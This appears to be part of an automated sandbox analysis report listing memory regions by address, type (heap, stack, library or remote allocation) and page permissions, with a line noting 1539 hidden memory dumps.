25A3AEB3000
heap
page read and write
152C000
unkown
page read and write
25A20A6B000
heap
page read and write
2280000
unkown
page read and write
3AC6000
unkown
page read and write
33A0000
trusted library allocation
page read and write
4711000
heap
page read and write
26C50000
direct allocation
page read and write
6A5B1000
unkown
page read and write
5086FE000
unkown
page read and write
7D7F000
heap
page read and write
6A10B000
unkown
page read and write
7D94000
heap
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
6B172000
unkown
page write copy
343C000
unkown
page read and write
25A32C6A000
trusted library allocation
page read and write
2DD7000
heap
page read and write
4711000
heap
page read and write
272F000
stack
page read and write
9B0000
unkown
page read and write
6B10F000
unkown
page read and write
4711000
heap
page read and write
6B3D4000
unkown
page read and write
2BB000
stack
page read and write
810000
unkown
page readonly
4E82000
unclassified section
page read and write
6A508000
unkown
page write copy
459B000
stack
page read and write
9C0000
unkown
page read and write
4B7E000
stack
page read and write
800000
unclassified section
page readonly
3020000
unkown
page readonly
4575000
remote allocation
page execute and read and write
4711000
heap
page read and write
69562000
unkown
page write copy
3390000
trusted library allocation
page read and write
4711000
heap
page read and write
4711000
heap
page read and write
25A3ADC4000
heap
page read and write
51E000
heap
page read and write
2B87000
heap
page read and write
4711000
heap
page read and write
7721000
heap
page read and write
1160000
unkown
page readonly
4711000
heap
page read and write
6949B000
unkown
page write copy
2A78000
stack
page read and write
25A3ADD1000
heap
page read and write
1CA88F1C000
trusted library allocation
page read and write
8ECE000
stack
page read and write
74E000
stack
page read and write
770E000
stack
page read and write
25A20A5F000
heap
page read and write
6B3DF000
unkown
page read and write
8506000
heap
page read and write
2313000
heap
page read and write
7FFB20250000
trusted library allocation
page read and write
2E8F000
heap
page read and write
692A3000
unkown
page write copy
25A3ABA0000
heap
page read and write
259A000
unkown
page read and write
63C0000
unkown
page execute and read and write
7FFB20010000
trusted library allocation
page read and write
4E6000
heap
page read and write
25A3AD84000
heap
page read and write
There are 1539 hidden memdumps, click here to show them.